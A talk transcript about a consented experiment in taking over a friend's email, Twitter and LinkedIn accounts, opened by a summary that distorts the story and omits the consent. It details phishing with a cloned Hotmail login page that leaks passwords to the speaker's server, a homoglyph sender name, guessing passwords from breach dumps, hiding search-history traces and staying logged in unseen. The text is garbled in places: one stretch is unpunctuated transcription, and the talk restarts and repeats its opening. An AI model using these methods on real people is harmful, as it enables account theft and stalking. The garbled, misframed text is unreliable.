How I hacked my friend without her noticing - Operation Luigi

**A Tale of Social Engineering: How I Manipulated My Friend's Online Presence**

I must say that I'm quite proud of myself for pulling off this elaborate scheme. It started with a simple idea - to change my friend's LinkedIn profile bio to be the entire Wikipedia page on Luigi, making it seem like she had developed an interest in the iconic Mario brother. And to my surprise, LinkedIn flagged her profile as "advanced," giving me a sense of accomplishment.

As I continued to manipulate her online presence, I decided to take it up a notch by changing her Twitter handle to a cleverly crafted phrase that would make it seem like she was trying to get noticed. And, boy, did she ever notice! She replied to the tweet, and I responded as her, pretending to be in on the joke. But what's interesting is that she didn't suspect a thing until we were both logged in at the same time, and then she realized she had been hacked.

But don't worry, I assured her that nothing bad was happening and promised to stop soon. And, for her sake, I did. However, this experience taught me a valuable lesson about online safety and the importance of two-factor authentication. So, I helped her set up 2FA on her email account, making it significantly harder for me (or anyone else) to gain access.

The aftermath was quite amusing, as she discovered that someone had taken over her Twitter account and was tweeting away with a Luigi-themed flair. She was thrilled to have this new "Waluigi" persona, and I couldn't help but chuckle at the absurdity of it all. But what's even more fascinating is how she asked me about online safety and security, wondering why she had been hacked in the first place.

In my response, I tried to be empathetic while also providing some practical advice on how to stay safe online. I explained that investing time and effort into securing one's digital life was essential but acknowledged that it's not always easy or fun. I offered suggestions like using two-factor authentication and keeping backup codes in a safe place, hoping that my friend would take heed of these warnings.

As we concluded our conversation, I couldn't help but wonder where I had gotten those LinkedIn and Tumblr password hashes from in the first place. Was it a leftover from a previous experiment? A careless mistake? Or simply a collection of passwords gathered over time? Whatever the origin, I was grateful to have them on hand for this little exercise.

In conclusion, our conversation about online safety and security was a delightful detour into the world of social engineering and digital manipulation. While it may not be the most responsible or recommended behavior, I hope that this story serves as a cautionary tale about the importance of being mindful of one's online presence and taking steps to protect oneself from potential threats. And who knows? Maybe my friend will take these lessons to heart and become a digital security expert in her own right.

**A Side Note: The Importance of Two-Factor Authentication**

As I mentioned earlier, two-factor authentication (2FA) is an excellent way to add an extra layer of security to one's online accounts. It requires both a password and a verification code sent to the user's phone or email address, making it significantly harder for hackers to gain access.

Using 2FA on your accounts is not just a good idea; it's a necessity in today's digital landscape. Many websites and services now offer 2FA as a standard security measure, so it's essential to stay ahead of the curve. And, as I warned my friend, there are many ways into an account that is not protected by 2FA.

So, what can you do to stay safe online? Here are some practical tips:

* Use strong and unique passwords for all your accounts.

* Enable two-factor authentication whenever possible.

* Keep backup codes in a safe place (like a password manager).

* Be cautious when clicking on links or responding to unsolicited messages.

By following these simple guidelines, you can significantly reduce the risk of becoming a victim of online scams and manipulation. And remember, it's always better to be safe than sorry – or, in this case, than Waluigi!

**Talk transcript**

Host: Alex is going to introduce himself, because he can do a much better job at it than I can. So, Alex.

Alex: Hi everybody. Hi, hello. I will see you all in 150 slides. Can you see everything okay? Good. My name is Alex, and some people let me do a talk here at PyCon, and so here I am. I used to do security incident response at Atlassian, but lately I've been doing red teaming, which is like sponsored crimes, and it's been really fun, and today I'm going to talk to you about some things. I've also agreed to help organize this conference called PurpleCon, and I've agreed to help organize it because I'm young and invincible.

A few years ago now, I wrote about some crimes that I did, and some journalists wrote about that blog post, and they said "according to a blog post by a hacker who goes by the name Alex", and they put it in quotes. Alex is my real name also, and so this is my hacker name now. You can call me that; I can't stop you.

I'm about to talk about hacking my friend, like a real friend, an actual friend of mine who's a real person and not made up. So in case any of you are having the genius idea that you should hack your friends: don't do that. It's not a good thing to do. The only reason it's okay that I did it is because I explicitly asked them, like, "Diana, is it okay if I try and hack you? Do you understand what it means? Are you sure you want to take the risks?" and so on and so on, and this person said yes.

Anyway, this is my friend Diana. Diana's not her real name, that's not a real picture, this whole thing is a lie. But it's not a lie that she really did say it's okay for me to try and hack her, and I explained what all that is. Some things about her that you're going to need to know are that she's a comedian, that's her job, and she's sweet and young, and her tech literacy is normal. All of you people here at PyCon probably know more about computers than she does; she knows the normal amount for someone her age. So for some reason she said yes. By the way, she was the first person I asked. I was like, "Hey, is it okay if I try and hack all your stuff?" and she was like, "Yeah." That was much easier than I thought it would be.

And so I made some rules, because there's not just going to be no rules. So what constraints are we going to have? I have 12 months to do it; I can do it at any time in that 12 months. I'm not allowed to delete anything, so I'll have to add stuff and look at stuff. I was like, "What if I deleted your emails?" and she was like, "Oh, that would be bad." Okay, you can't do that. Also, I'm not allowed to disrupt her daily life. This means if I were to lock her out of her email account by changing the password, then that would be bad, because she needs her email account to do things. Or if I was to spam post stuff on her Facebook wall, then that would be bad, because she'd be distracted by that. I need to not interrupt her or inconvenience her, because she's my real-life, real friend. Also, I decided that I'm just going to do this whole thing without getting caught, because that's what not getting distracted sounds like anyway. And also I'm not allowed to exploit the fact that I know her in real life. So I know her email address and phone number and where she lives and all this stuff; I'm going to not use that information. I'm going to do it as if I was a real hacker.

Oh, that's right: this talk is Operation Luigi, and there's the picture of Luigi at the beginning. You might be wondering why this talk is called Operation Luigi. In the interest of time, let's get straight to it.

The first thing we have to do is find out what her email address is. Even though we already know, we have to find it. And so I'm using this advanced hacking software, and I'm going to just put her name into it and the word "linkedin", and LinkedIn just tells me, "Here's what her email address is," because LinkedIn encourages you: "Hey, put your email address on LinkedIn so people can find you." People like me. Not really, mostly recruiters, but also people like me. I notice it's a Hotmail email address, and I'm like, oh, maybe this is wrong, maybe this is old, because no one's using Hotmail still, are they?

But then I went to her Twitter. I wanted to know whether this was her real email or her main email address. If you try and reset your password on Twitter, it will say, "Sure, you can reset your password, we're going to email a link to..." and then it will give you most of the email address; it'll give you a few letters and the domain. And I was like, cool, this means the Hotmail one is a current email address. Weird that she's still using Hotmail, but okay. Also, this screenshot is old; this doesn't happen anymore. Twitter doesn't let you do this anymore. If you go and reset your password on Twitter right now, it'll be like, "Sure, you can reset your password, type in the email address that you use to log into this Twitter account, tell us the email address, and then we'll give you a link," presumably to prevent this. So, good stuff, Twitter.

Okay, so now I have to get a phone number, I think. By the way, this is my first time hacking someone or anything, and so I don't really know what I'm doing, but I've seen other people do it at conferences. So I'm like, I think I just need to collect everything that can be collected about this person first, and then somehow hacking will happen. And so I've got an email address, and I'll put the word "phone" into my advanced hacking software. I've actually obscured the name of the hacking software so you can't tell which one it is, because it's so powerful.

And so I do this, and there's a page that just says, "Hey, do you want to sign up to this club?" because she's the head of some sort of club, and it says "contact Diana at this email address, this phone number", because she just put it online because she wanted to be found. So I'm not saying she's dumb or bad for doing this; this is totally normal, right? You have to have some sort of privacy trade-off if you're going to advertise yourself, which is what you need to do if you're organizing a club or anything. So what can you do about that, right? If you want to organize a club, you've got to put some sort of contact information on the internet. It works for me.

And so now I'm like, okay, what do I do? I have the email address and phone number. What do I do now? Maybe I should... I went to a lot of conferences, and they say you have to email someone a Word document with macros in it, and then they click the macros, and then you have control of the computer. And I was like, okay, well, I don't really know how to do that. Also, does she even have a laptop? Maybe she just has a phone. Also, if I got control of the computer, then what would I do? I would probably just try and get her browser cookies and log into cloud stuff anyway. So maybe I don't actually want control of the computer; maybe I want her email and passwords and stuff. So okay, I'm not going to do this, this is too hard. Maybe I'll try and hack into email first and then I can decide what to do, because her email is kind of the keys to the kingdom, sort of the top of everything. If you can get into someone's email, then you can use the email to reset their Twitter and reset their other stuff and get into all their other accounts. So I'm going to try and go for that. This is how I justified this to myself. It was late at night, whatever.

Okay, so now I have to get her email password. Note that I can't get into her email any other way; I have to actually know her email password and type it in and log in at the same time as her. Because if I got into her email any other way, by pretending to be her and resetting it, she will get kicked out of it. So she has to also still be in email, and also not know that I'm also in her email. So the only way I can do this is by just getting the password, which is what I'm trying to do.

There's this great website for getting passwords called Have I Been Pwned. A lot of controversy on how to pronounce that. You put in an email address and it will tell you which of the public data breaches, as they're called, that email address appears in. So you can put in your email and it will tell you, yeah, LinkedIn got hacked in 2012 and your email was in there, so some hacker has your LinkedIn password. And it will tell you that for all the different sites that have been hacked, all the different ones that this website knows about. Cleverly, nowhere does it say that you need to put in your own email address, so very cleverly I put in her email address, and I find that, at the time of writing, she was in a few. The only interesting ones were Patreon and Tumblr. Patreon didn't have passwords; Tumblr was the only one that had passwords in the data breach thing. And so I was like, okay, cool, I know my friend's password is on the internet now. I know it's in this Tumblr thing. This is great.

So now, the Tumblr password dump is something that I just happen to have lying around, and it looks like this: it's a big text file, and it's just got the email address and then a colon and the password hash. Hackers are not very good at documenting their stuff, so they don't really say what kind of password hashes they are; it's just a text file. I looked around the internet, and people seem to think that they're SHA-1 hashes with a static salt.

And I'm like, cool, what does that mean? So let me explain what a static salt is. Imagine you're a website, let's call them Tumblr, and you're storing emails and passwords. This is one way you could do it: you could store the email address of the person, and you could also just store their password, because then when they log in you know whether they typed in the right password, because you have their password. But then you go to a security conference and they tell you you're not allowed to do that. So okay, actually you need to hash the passwords. This way you don't store the password, you store this scrambled-up version of it, and then you don't have to keep a copy of the user's password, but you can still check whether they typed the right password in. So okay, now you're storing password hashes, and you're like, "Am I doing it now?" And people at security conferences are like, "No, this is not good enough, you need to do the salting thing now." So now, before you hash the password, you need to add a random string to the end of it, just in case somebody has a big list of the hash of every possible eight-character string; then they could possibly use that to reverse what your hash was back into the password. So you have to add this salt thing to the end. And so you go, okay, okay, and now you're adding this salt, and you add it to the end of the password like this. This is called a static salt, and static means it's the same for all the passwords. So now you're adding the same thing to the end of every single password, and the point of this is to prevent somebody with a big list of the hash of every single string from using that big list to reverse your password hashes. But do you see the problem here? The problem is that these two users have the same password, and because we're adding the same thing to the end of the password, the same static salt, the thing that's getting hashed is the same for both of these people. In fact, they're going to have the same password if and only if they have the same password hash. And so even when we hash everything, you can see these two users have the same password hash. You don't know what it is, you don't know what the password is, but you know these two people have the same password, because of the static salt thing.

So why am I telling you all about this static salt thing? It's because I don't know what the salt is for the Tumblr password dump. Even though the salt is not meant to be a secret thing, it's meant to be public, as public as the usernames, I don't know what it is, because it's not included in the text file, because hackers are not good at documenting their stuff. So I'm like, okay, I really want to get my friend's password out of this, but I don't know how.

So the first thing I did when I had the list was I searched for my friend's email address. If I grep for her email address, I'll get all the lines that have her email address in them, which is just the one with her password hash in it. I'm like, cool, but I don't know what password this password hash is of. So here's the sneaky thing I do: I search for her password hash in the file. Not her password, just her password hash, like an absolute madman. Well, what do you think will happen when I grep for her password hash? It should just be one line, right? It should just have my friend Diana's thing. There's like 20 people who have the same password hash, right? And these people, it's like a little password book club, right? They can all get along, and these fun little book enthusiasts all have the same password on Tumblr. And so this tells me a few things. Probably it's not a very good password, since all these people have thought of the same one. But again, I'm very smug, but I don't know what it is, so I need to find out what it is.

So here's what I do. I get just the email addresses of those people in the password book club; I throw away the password hashes, I don't know what to do with the hash. Just get those email addresses; these are all the people who have the same password as Diana. And then, conveniently, did you know that LinkedIn was also hacked in 2012? Diana was not in this list, because she didn't have LinkedIn in 2012, but lots of people were. And thanks to the hard work and GPU cycles of people in the password cracking community, almost all those LinkedIn passwords are in plain text now. They're not just hashes; they're emails and passwords you can just look at with your eyes. And I was like, wow, I also just happen to have that lying around. So then I looked up the same people, who were in the password book club in the Tumblr list, in the LinkedIn list, and I found most of them. Not all; about 80 of them had the same password as each other on LinkedIn as well. So isn't that really sweet, that book club transcends services? I thought it was sweet. And I found that most of them had the password "qwerty1".

So this is a bit of a jump here, but I'm guessing that my friend Diana has the same password as all these people on Tumblr. Okay, I'm not guessing, that's definitely true. And then I'm guessing that they'll have the same password on LinkedIn, and then I'm guessing that that password is this most frequent one, this "qwerty1" thing. I'm guessing that that's Diana's password. And I'm like, okay, I've done it, let's go. "qwerty1" is the password, I did it, I'm hacking, let's go. It's time to use this thing. I go to Hotmail, type it in, and it's not the right password. That's not her Hotmail password. And I was like, well, damn, why did I do all this work? Why did I go to all these great lengths? Okay, whatever.

So then I go to Facebook. I don't just try it on her Hotmail; I try it on everything. I go to Facebook, and it says, "Oh no, that's not your Facebook password, but it's an old password. It was your password about five months ago." I'm like, oh, thanks, Facebook, for taunting me. I guess I'm too late. But okay, so this did used to be her password; she just happens to have changed it recently, and I've somehow stumbled upon a person who has more than one password in their life. So I'm like, okay, fine, I guess it's the hard way, which is what I didn't want to have to do.

By the way, this is what I had planned, this is what I thought this hacking would be like. I was going to be like, "Ah, it's so easy to hack someone, you just look them up in all these lists you have lying around, and it's as easy as that." And so the rest of this talk will be about how it's not as easy as that, always.

So I'm like, okay, I guess I'm going to try and do this phishing thing. I'm going to try and trick her into sending me the password, because everyone else is doing it. It's more work, because you have to make something custom, but oh well. I don't know, is this how you do phishing? I don't know, it's my first time. Maybe I should do something like this? I don't know. You don't know that it won't work. So now I'm going to do this. Here's the plan I come up with. I'm going to send her a fake email from Microsoft, because she has Hotmail, so it has to be Microsoft. And that email is going to take her to a login screen for Hotmail, but it's a fake login screen that actually sends me the password, and then she'll go to the real Hotmail login screen and just kind of keep going as if nothing happened. This is my plan. I don't know, whatever.

But to do this I'm going to need to make a Hotmail account to send the email from. So I go to make a Hotmail account, which will let me open a world of benefits, and I try to make one that looks like Microsoft. I try to make a "Microsoft Account Team" and it says, "No, you can't do that," presumably because the word Microsoft is in the email address and they know I'm not Microsoft. And so I try to make my first name "Microsoft" and my last name "Account Team", and they're like, "No, you can't do that," presumably to stop exactly what I'm trying to do. And fair enough. However, these are my round friends. These look like two o's, don't they? It looks like I put two o's in this slide like an absolute fool, but actually one of them is an o and one of them is a Greek letter omicron, which looks a lot like an o to you and me, doesn't it? But to a computer they're completely different Unicode code points. And so if you just spell Microsoft like this, with these omicrons, then that doesn't say Microsoft, but to you and me it looks like it does. And so does this really work? I'm sure you're wondering, surely the billions of dollars at Microsoft and the most advanced minds aren't going to be fooled. But no, it does work. Yeah, it does.

And so I make this Microsoft Account Team thing, and I send this email, which I copied from a real Microsoft email that I got. I copied all the styling and most of the text, and it says, "Oh, you better log into your account in the next 48 hours or we're going to lock it. Please do it or it's going to be real bad. Oh boy, there's Russian IP addresses, you wouldn't want that," I don't know. And so it says, come and log in, please. But again, this is just an email; that "don't lock my account" thing at the bottom there has to be a link to something. So I need to make a website for that bottom button to link to. So okay, let's go. This is the real Hotmail login screen as it was at the time, and so I need to make a copy of this.

There's another way to make a copy of things. There's this hacking tool technique I learned about. Have you seen this before? Step one, you right-click on something. Step two, you hit this button, and when you hit that Inspect Element button, that's the good stuff. I think there are easier ways to copy websites, but I always do it this way anyway. So here's my copy of the website. It looks the same because it is the same, but this time it's on my computer, it's on localhost. And so now I need to put it on the internet somehow. I can't link her to localhost, so how do I put this online? And I found this static hosting company website thing. They're not paying me to say this, but they let you host static files on the internet, and this is really good because you get a custom subdomain, so you can be anything.aerobatic.io, and they give you HTTPS for free, and it's like two commands or something to do it, and no one knows about it, so all the good subdomains aren't taken. So I'm sure it's a good static hosting site, but it happens to also be a really good phishing hosting site. So thank you to these people. You can use the promo code "diana" to be immediately reported to the authorities.

So this is the one I made, this is the domain I chose. The real Hotmail login domain is login.live.com, and so I could have made my own domain name and made it look even more similar, but I just don't think Diana's going to look at the URL very much, because she's not a paranoid security person like us. But then again, for some reason, when you go to a login screen, the URL doesn't look like that, it looks like this: it has a bunch of stuff at the end. And so I just added a bunch of stuff at the end. It doesn't do anything; I actually stole it from the Google login screen. But whatever, okay, it's my first time. And so here it is.

This is my fake login screen on the internet now. I know it's the same picture, but this time it's on the internet, trust me. And so I also add these bonus features to it. The first one is that after she clicks the login button, the submit button, it's going to add an image to the page, and the image goes to a website I control, slash "diana", and then a question mark, and then plus whatever the password is. The reason I'm doing this is to try and steal a password. This is a terrible, awful way to do it that you probably shouldn't do, but it's really easy. So I'm going to get a request to my website, slash "diana", and then plus some password. I don't know what this password is, so it's going to be a 404, but then in my logs it's going to be a request for a 404 to "diana" and then the password. So I'm just going to be looking at my logs for this "diana" thing, and when it shows up I'll be like, "Ah, that's the password." And then I make it so that after she clicks the button, it waits one second and then goes to the real Hotmail login screen. The one-second wait is to simulate Australian internet speeds.

Anyway, here's the email I send. It's like, you know, "Look out, something real bad's going to happen, and you only got 48 hours," because I'm creating time pressure and I'm doing all the good stuff I've seen random phishing emails do. But I kind of just want this to work, so come on, click the link. And so I send it to her, and it says you have 48 hours, and then 24 hours later nothing happens. I'm looking at my logs and she's not there, so I'm like, she hasn't clicked on it yet. So I send the email again saying the same thing, but "now you only have 24 hours, you better click it," and then 48 hours later she also doesn't click on it. And I'm like, oh, okay, all right. At this point I'm not actually hacking anyone; I'm just emailing my friend. I'm like, okay, that's a shame, I guess it wasn't an interesting enough email.

And fair enough. The thing I learned from this is that people don't really care about emails from Microsoft, or about automated emails. I care about emails from people. Which leads me to the next way I try and do this: she's going to be on the internet, whatever, and she's going to get an email from a recruiter, and the recruiter is going to link her to the same fake login page, and then you're going to go to a Google Doc, and the login page is going to make you log in to see a Google Doc. Is that such a thing? But this is Microsoft, this is Hotmail. Hotmail doesn't have Google Docs. Is there such a thing as Microsoft Google Docs? And so I look it up. Is that a real thing? And there is, and it's called Cloud Sky something something something. And so I'm like, great. And so I log into this and make... oh no, I think I make the document in something else and then copy and paste it into this. And so now I have a Microsoft Google Doc. And you might be wondering what document I made. I made a resume, like a fake but convincing-looking resume.

And then I send her... oh no, before I do that, I have to make the person who's going to send it to her. I can't email her from me; I can't email her from a Microsoft Account Team. So I guess it's going to have to be from this fake person. So I go to the Google login screen, you can put whatever you want in these boxes, it's very good, and I make this person called Kathleen Wheeler, who's a mix of a first name and last name from a real company that I found. And then I sent her this, which says... this is me writing this. Sometimes I sound like I'm a recruiter, I don't really know what it would sound like. And I'm saying, "Hey, I work at this comedy company," which she cares about, which I looked up earlier on LinkedIn, "and somebody has listed you as a reference. Somebody has told us that you work together, somebody has said that they worked with you. Here's the resume, tell us how you know them," blah blah blah, "click here for the resume." That link is obviously the one that goes to the fake login screen. And then after all this text, being like, "Can you fill out this form and tell us these things," blah blah blah, that's just to distract from the link. And then it says, "Also, can you let me know a good time to call you?" and the phone number is her phone number, which I found earlier. Okay, the reason I put a phone number there is so she knows this is for her, it's not an accident; this person clearly knows who she is. And then I made a sweet email signature at the bottom with a different font and everything. I thought it was really good attention to detail, or whatever.

And so I sent this to her, and it totally works. She clicks it, she types in a password, the whole thing just works flawlessly, and I was like, wow, that was really easy. And then I looked a little bit closer and I'm like, wait a minute, this password that she sent me, that's "qwerty1". I already have that one. I was like, what? How could that... did I do something wrong? And then I was like, no, wait a minute. Here's what I've learned: she does not know how to help me out. That's what it is, which in many ways is the ultimate defense against people. So don't shame her for this. But also, because my fake login screen will just say yes no matter what password you type in, she actually thinks this is her password. And I'm like, whoops, I hope I can fix that after this is all over.

Anyway, so instead of giving up, I update my login screen, so now no matter what you type in, it just says "wrong password" the first three times. My theory is that people who memorize all their passwords, they just try one, and if it doesn't work, they try the other one and the other one; they just unload all their passwords into the form. And I also change it so that if you try "qwerty1" the counter doesn't go up, so you can't just type "qwerty1" three times.

And so then I send it to her, and then she replies, and she's like, "No, I haven't worked with this person," which is true, because I don't exist. And then she's like, "Yeah, you can call me," and that's the right phone number. And I'm not going to call her, because I'm not capitalizing on that. And then I reply being like, "Oops, that was the wrong resume. For some reason you'd better click on this." This makes no sense, right? If you stop and think about this: "Oh, there's another person who also worked with you around the same time but with different dates, and I sent you their resume instead of the other one." That doesn't make any sense, right? This story doesn't work, but it has the same bait, of somebody says they know you and you have to click to find out who. And so I'm like, please just click on it anyway, please. And she does. And this time the same thing happens. She clicks on it, and she types in a thing. She types the same thing three times, which is this other password, which looks a lot like "qwerty1". Oh, also, none of these are real, but they're similar to what they actually were. This one's shifted along by one on the keyboard. I'm like, hmm, okay, what's this password? And so I go to Hotmail, and using the advanced hacking software Google Chrome, type the password into the Hotmail login screen and press enter, and it totally works. I get into email. And I'm like, it's as easy as that, everybody, see, it's simple.

Okay, so I got an email password, but now what do I do? I try the same password on everything and it doesn't work. I'm like, great, this person has three passwords in their life. And then she replies, being like, "No, I haven't worked with this person either. Why are you doing this? What's happening?" And I reply just being like, "Don't worry about it, don't stress about it, you know, I'll just handle it, please don't email me anymore, please just forget about this." And she does; she doesn't reply. So I'm like, great.

Meanwhile, I log into email, and I want to search for more passwords so I can log into more stuff. So I click on the search bar thing, and it shows me her last five searches. The last five searches aren't anything interesting, but I want to search for "password" and other things, and if I do it, then she'll see it's in her search history, right? So I write down the last five things she searched for, and then search for my stuff, and then search for those things in reverse, so it looks exactly the same, because it only shows the last five. Microsoft knows what I've done, but I'm doing it anyway. And it totally works, but I didn't find any passwords. I mean, I found a lot of passwords I already had, but I didn't find any new passwords. And I was like, fine, whatever.

So this is the end of the talk, I guess. That's it. I mean, never believe it when it says "the end?" No, it's obviously not the end, geez. This talk is called Operation Luigi, and I'm already in my friend's email. You know, it'd be a real shame to just kind of leave it at that, to not do anything with that. So here's what Operation Luigi is. Here's what we need to do. First thing is get into her Twitter. Second thing is to not lock her out of her Twitter, because she needs to be in there too. And also don't let her know that I'm in her stuff; she doesn't have to know that I'm in her Twitter. So here's how I do it. I go to Twitter and I'm like, "Hey, I forgot my password," until it lets me reset it, because I'm in her email now, and so I can reset the password, because it'll send me the email and I can click it. And so I change her Twitter password to "qwerty1", because this is the password that I think she thinks her password is, and there's a
little emails and blah blah blah wait for her to log in and because i need her to log in so i know that she's actually type 21 and she's back in her own account and i wait a while and then eventually she actually logs in and i'm like great it works she retweets she reshooted a picture of a dog and i was like yes okay so then i do the exact same thing with linkedin as i did with twitter and i try to change the linkedin password to kodi one as well but it doesn't let me presume because i got the qwerty one from the linkedin password jump so they know it's bad then there's a little box at the bottom which says require all devices to sign in with a new password which is like would you like to sign me out on like would you like to sign out all your other devices and i'm like absolutely not thank you linkedin for giving me this option it's unchecked by default so i can just change your password without even signing her out and so i just do that and then i log in and so okay now what let me explain so this picture of obama is here because i can't show you down as real pictures i have to show you uh because i can't show you how real profile pictures i'm going to show you what i did to her real profile pictures but with pictures of obama i don't know just go with it and so here's what her twitter picture was and i changed it to be like this i don't know if you can tell there's like it's like a low there's like a lightly transparent luigi there and so also she had a linkedin picture and i changed the linkedin picture to have like another luigi on it can you see it and so i just left it there for like i don't know weeks i don't know okay yeah good weeks i just left it there and no one said anything and i said okay i thought she might have noticed then but this is sort of like proof that i got somewhere and so you know nothing happened so i was like okay well was this over this was operational luigi because it's not over the remainder of this talk will be about operation 
waluigi and you know i came up with this like a long time ago back when this meme was like you know new anyway whatever waluigi let's go so i changed her link i changed her linkedin bio to be the entire wikipedia page for luigi and when i do this linkedin says her profile strength is advanced so thank you linkedin thank you linkedin for being there for me this entire talk anyway i changed her twitter to be this like i i want to make it super obvious so she i wanted to know that i'm there i want i want to be caught now like i'm trying to be caught i'm like hello notice me i'm very loud i tweet this from her account just go for it and she's online at the same time because it's like 7pm and she replies and she says omg to this thing and she says i've been hacked my dudes but then because i'm also logged in at the same time i reply as her saying oh no no it just seemed like the right thing to do at the time anyway then i tweet this then i create this and i keep doing things until she messages me and i treat longings for the days of this sweet lad and keep tweeting things and eventually she messages me and be like oh my gosh my twitter is this you and i'm like yes it's me don't worry nothing bad's happening i'll stop now it's all congratulations i guess you got me um and here's what happened after that um she loves her new waluigi life so much she goes and changes her facebook to be a waluigi themed even though i didn't even touch it um she listens to she's like gets really into luigi culture i'm not going to read this that like she like she like really got into it and she also asked me like wow how do i not get hacked like how do i what did i do wrong i'm like well you didn't do anything wrong but like this is kind of a question that people ask a lot right people ask security people like how do i stay safe what should i be doing online and these are just like regular people who ask this like not security people they're just like normal people they're not weird like us 
And they say, oh, how do I stay safe? And sometimes the kind of answers they hear from security people are like, oh, you've got to do all these things and live in a submarine and never go anywhere and get all this advanced multi-factor, YubiKeys or whatever. And so there are other things you can say. So here's what I told her. I was like, well, listen, it's up to you, right? There are things you can do to stay safe, but they involve investing more time and effort. It's up to you how much you invest, it's up to you how much you care about this. Maybe you don't care and you're fine with getting hacked; that's okay, that's a valid way to live your life.

And so I help her set up two-factor auth on her email, because I'm about to do this blog post and publish a guide on how to hack her, so I don't want it to be repeatable. So I help her set up two-factor auth, so now she'll get a code on her phone, which would have been way harder for me to get past, because it's way harder to get past two-factor; you have to, I don't know, phish the two-factor auth code or socially engineer the phone company, too hard. And she was very happy that it wasn't that hard, she was very happy that she could just do this and it wasn't much extra effort for her, because this is the lowest-effort, highest-security-value thing I think that she could have done. And so she has a little app like this, you know, she has this little app and she's like, yeah, now I can just type in these codes. These backup codes are kind of a trap though, and I kind of warned her about only using the app, because see that button that's like "save to a text file" or "keep these codes somewhere safe"? No one clicks those buttons, everyone's just like, yeah, whatever, close. No one keeps these backup codes, and so that's one of the reasons it's good to have SMS as a backup.

Anyway, in conclusion, I just talked about Luigi for a long time, so I hope you liked it. Oh, the last thing is, you might be wondering where I got these. Before, I was like, oh, I had these lying around; you're probably wondering where I got the LinkedIn and Tumblr password hashes, where do they actually come from? Thank you very much, thank you.

Hello, thank you Alex for that talk, we have a lovely cup for you, thank you. Can Melissa, oh sorry, Alyssa, come up to the stage? Awesome, thanks. Alex is going to introduce himself because he can do a much better job at it than I can, so, Alex.

Hi everybody, hi, hello. I will see you all in 150 slides. Can you see everything? Okay, good. My name is Alex, and some people let me do a talk here at PyCon, and so here I am. I used to do security incident response at Atlassian, but lately I've been doing red teaming, which is like sponsored crimes, and it's been really fun, and today I'm going to talk to you about some things. Also, I've agreed to help organize this conference called PurpleCon, and I've agreed to help organize it because I'm young and invincible. Recently, no, not recently, a few years ago now, I wrote about some crimes that I did, and some journalists wrote about that blog post, and they said, "according to a blog post by a hacker who goes by the name 'Alex'," and they put it in quotes. Alex is my real name also, and so this is my hacker name now. You can call me that, I can't stop you.

I'm about to talk about hacking my friend, like a real friend, an actual friend of mine who's a real person and not made up. So in case any of you are having the genius idea that you should hack your friends: don't do that, it's not a good thing to do. The only reason that it's okay that I did it is because I explicitly asked them, like, is it okay if I try and hack you, do you understand what it means, are you sure you want to take the risks, and so on and so on, and this person said yes.

Anyway, this is my friend Diana. Diana's not her real name, that's not a real picture, this whole thing is like a lie. But it's not a lie that she really did say it's okay for me to try and hack her, and explain what all that is. Some things about her that you're going to need to know: she's a comedian, that's her job, and she's sweet and young, and her tech literacy is normal. All of you people here at PyCon probably know more about hacking computers than she does; she knows the normal amount for someone her age. And for some reason she said yes. By the way, she was the first person I asked; I was like, hey, is it okay if I try and hack all your stuff? And she was like, yeah. That was much easier than I thought it would be.

So I made some rules, because there's not just going to be no rules, so what constraints are we going to have? I have 12 months to do it; I can do anything in that 12 months. I'm not allowed to delete anything, so I'll have to add stuff and look at stuff. I was like, what if I deleted your emails? And she was like, oh, that would be bad. Okay, you can't do that. Also, I'm not allowed to disrupt her daily life. This means if I were to lock her out of her email account by changing the password, that would be bad, because she needs her email account to do things. Or if I was to, I don't know, spam-post stuff on her Facebook wall, that would be bad because she'd be distracted by that. I need to not interrupt her or inconvenience her, because she's my real-life friend. Also, I decided that I'm just going to do this whole thing without getting caught, because that's what not disrupting her sounds like anyway. And also, I'm not allowed to exploit the fact that I know her in real life. So I know her email address and phone number and where she lives and all this stuff; I'm going to not use that information. I'm going to do it as if I was a real hacker. Okay.

Oh, so that's right, this talk is called Operation Luigi, there's a picture of Luigi at the beginning, and you might be wondering why this talk is called Operation Luigi. In the interest of time, let's get straight to it. The first thing we have to do is find out what her email address is. Even though we already know, we have to find it. So I was like, okay, well, I'm using this advanced hacking software, and I'm going to just put her name into it and the word "linkedin," and LinkedIn just tells me, here's what her email address is, because LinkedIn encourages you: hey, put your email address on LinkedIn so people can find you. People like me. Not really, mostly recruiters, but also people like me. I notice it's a Hotmail email address and I'm like, oh, maybe this is wrong, maybe this is old, because no one's using Hotmail still, are they? So then I went to her Twitter. I wanted to know whether this was her real email, her main email address. I went to her Twitter, and if you try and reset your password on Twitter, it will say, sure, you can reset your password, we're going to email a link to... and then it will give you most of the email address; it'll give you a few letters and the domain. And I was like, cool, this means the Hotmail one is a current email address. Weird that she's still using Hotmail, but okay. Also, this screenshot is old; this doesn't happen anymore. Twitter doesn't let you do this anymore. If you go and reset your password on Twitter right now, it'll be like, sure, you can reset your password, type in the email address that you use to log into this Twitter account, tell us the email address and then we'll give you a link, presumably to prevent this. So, good stuff, Twitter.

Okay, so now I have to get a phone number, I think. By the way, this is my first time hacking someone, anything, and so I don't really know what I'm doing, but I've seen other people do it at conferences, so I'm like, I think I just need to collect everything that can be collected about this person first, then somehow hacking will happen. So I'm like, okay, I've got an email address, and I'll put the word "phone" into my advanced hacking software. I've actually obscured the name of the hacking software so you can't tell which one it is, because it's so powerful. And so I do this and there's a page that just says, hey, do you want to sign up to this club? Because she's the head of some sort of club, and it says contact Diana at this email address, this phone number, because she just put it online because she wanted to be found. And so this is not... I'm not saying she's dumb or bad for doing this, this is totally normal, right? You have to have some sort of privacy trade-off if you're going to advertise yourself, which is what you need to do if you're organizing a club or anything. So what can you do about that, right? If you want to organize a club, you've got to put some sort of contact information on the internet. It works for me.

And so now I'm like, okay, what do I do? I have the email address and phone number, what do I do now? Maybe I should... I went to a lot of conferences and they say you have to email someone a Word document with macros in it, and then they click the macros, and then you have control of the computer. And I was like, okay, well, I don't really know how to do that. Also, does she even have a laptop? Maybe she just has a phone. Also, if I got control of the computer, then what would I do? I would probably just try and get her browser cookies and log into cloud stuff anyway, so maybe I don't actually want control of the computer; maybe I want her email and passwords and stuff. So, okay, I'm not going to do this, this is too hard. Maybe I can just...
